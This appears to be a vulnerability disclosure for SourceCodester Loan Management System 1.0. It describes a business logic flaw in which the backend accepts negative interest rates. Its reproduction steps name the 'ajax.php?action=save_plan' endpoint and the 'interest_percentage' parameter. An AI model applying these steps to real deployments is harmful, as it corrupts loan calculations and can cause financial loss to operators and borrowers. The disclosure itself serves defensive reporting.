SourceCodester Loan Management System Negative Interest Rate Business Logic Vulnerability

A business logic vulnerability has been identified in SourceCodester Loan Management System version 1.0. This issue arises from inadequate server-side validation, allowing administrators to create loan plans with negative interest rates. Although the frontend restricts users from entering negative values, this limitation is not applied on the backend. An authenticated attacker can exploit this by manipulating the HTTP POST request to include a negative interest percentage, resulting in the creation of loan plans that disrupt the application's financial logic.

Impact

Exploitation of this vulnerability leads to the creation of loan plans with negative interest rates, causing incorrect loan calculations and potential financial losses if such plans are applied to real loans.

Reproduction

To reproduce this vulnerability, log into the application as an administrator and navigate to the Plan Management page. Although the frontend blocks negative input in the Interest field, this can be bypassed by sending a POST request to the 'ajax.php?action=save_plan' endpoint with a negative value for 'interest_percentage'. After the request is processed, the negative interest rate will be reflected in the loan plan, confirming the vulnerability.